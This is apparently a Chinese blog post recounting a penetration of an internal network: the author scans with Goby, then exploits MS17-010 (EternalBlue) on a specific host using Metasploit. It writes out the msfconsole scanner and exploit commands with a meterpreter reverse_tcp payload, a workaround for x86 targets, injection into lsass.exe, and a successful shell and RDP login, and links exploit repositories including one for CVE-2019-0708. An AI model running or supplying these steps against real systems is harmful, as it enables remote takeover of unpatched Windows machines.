ms17-010永恆之藍的漏洞利用


ms17-010永恆之藍的漏洞利用

0x00 前言

最近疫情嚴重,上班時間一拖再拖,在家學習的時候發現了goby,用於用於監控網絡 IT 資產,

昨日復工,正好可以試用一下,掃描一下內網資產


補充個0708的 https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows


0x01 Goby簡介

分析目標網絡IT資產的規則來建立知識庫,可以在發生安全事件時在最短時間內管理安全緊急情況。與傳統的端口掃描和漏洞掃描不同,Goby僅在較小的受影響區域處理漏洞緊急情況,因此此方法最快,對目標網絡的影響最小


官網下載https://gobies.org/ 安裝試用

設置掃描任務

ms17-010永恆之藍的漏洞利用


期間發現了一臺主機可能有永恆之藍,遂打之


0x02 msf--ms17-010

掃描確認

攻擊機 kali linux

靶機 10.118.72.111

工具 metasploit


nmap掃描靶機端口,確定445端口開啟


<code>msfconsole #進入msfmsf >search ms17-010 #查看相關模塊msf > use auxiliary/scanner/smb/smb_ms17_010msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.118.72.111msf auxiliary(scanner/smb/smb_ms17_010) > exploit /<code>


確認 vulnerable!

ms17-010永恆之藍的漏洞利用


說明主機10.118.72.111存在MS17-010漏洞


漏洞攻擊


下面使用攻擊模塊


<code>msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.118.72.111rhost => 10.118.72.111msf exploit(windows/smb/ms17_010_eternalblue) > set lhost xxxlhost => xxxmsf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) >/<code>


但是。。。沒打成功


後面找到了參考https://laucyun.com/a6cb3c752b0fc10f0a9eeef01f7a5f76.html


x86平臺下失敗的解決方法

msf自帶的利用模塊只針對x64版本的操作系統,而對於x86版本的系統卻失效,可以使用https://git.laucyun.com/security/Eternalblue-Doublepulsar-Metasploit.git來解決


最後的配置是

ms17-010永恆之藍的漏洞利用


ms17-010永恆之藍的漏洞利用


oh 當時還修改了一個 set PROCESSINJECT lsass.exe


就成功拿下

ms17-010永恆之藍的漏洞利用


ms17-010永恆之藍的漏洞利用


3389端口開啟


ms17-010永恆之藍的漏洞利用


遠程登錄成功!


其他資料


ms17010這個問題其實比較難,看到好資料先收藏起來,以便以後攻防使用


https://mp.weixin.qq.com/s/EoHB02qOscZsj3cNS40Rsw


由於內網滲透經驗不足,因此還在摸索,大家可以提一下下一步滲透建議哈!


分享到:


相關文章: